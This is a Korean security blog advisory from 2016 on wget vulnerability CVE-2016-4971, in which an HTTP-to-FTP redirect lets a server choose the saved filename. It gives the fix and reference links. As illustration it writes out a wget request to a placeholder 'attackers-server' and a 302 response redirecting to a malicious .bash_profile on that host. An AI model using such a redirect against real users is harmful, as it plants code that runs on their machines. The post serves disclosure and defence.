상세 컨텐츠

본문 제목

Wget취약점(CVE-2016-4971) 발견!

국내외 보안동향

by 알약(Alyac) 2016. 6. 22. 14:00

본문

Wget취약점(CVE-2016-4971) 발견!


최근 CVE-2016-4971취약점이 발견되었습니다. 이 취약점은 모든 wget에 존재하는 취약점으로, 공격자는 해당 취약점을 이용하여 프로그래머나 유지보수 관리자에게 피싱공격을 통하여 root권한을 탈취하거나 rootkit을 심을 수 있습니다


원리


wget은 *nix시스템에서 자주 사용하는 다운로드 툴로 http, https, ftp등 다양한 프로토콜을 지원합니다. wget을 사용하여 파일을 내려받을 때 HTTP 서버에서 FTP서버로 리다이렉션 된다면, wget은 추가적인 인증 없이 http서버, 리다이렉션 되는 URL에 있는 파일이름을 신뢰하는 것으로 판단합니다. 그렇기 때문에, 해커가 악성 파일을 내려보내는 방법을 이용하여 사용자 PC를 공격할 수 있습니다. 


예를들어, 우리는  wget http://attackers-server/safe_file.txt을 방문할 때, 만약 http 서버가 다음과 같은 응답헤더를 발송합니다. 


HTTP/1.1 302 Found

Cache-Control: private

Content-Type: text/html; charset=UTF-8

Location: ftp://attackers-server/.bash_profile

Content-Length: 262

Server: Apache


wget은 자동으로 리다이렉트 되고, 악성 FTP서버에 있는 악성 .bash_profile을 내려받게 되는것입니다. 



취약한 버전 


모든 버전의 wget


패치방법


GNU wget 1.18 버전으로 업데이트





참고 : 

https://bugzilla.redhat.com/show_bug.cgi?id=1343666

https://lists.gnu.org/archive/html/bug-wget/2016-06/msg00033.html

http://git.savannah.gnu.org/cgit/wget.git/commit/?id=e996e322ffd42aaa051602da182d03178d0f13e1


관련글 더보기

댓글 영역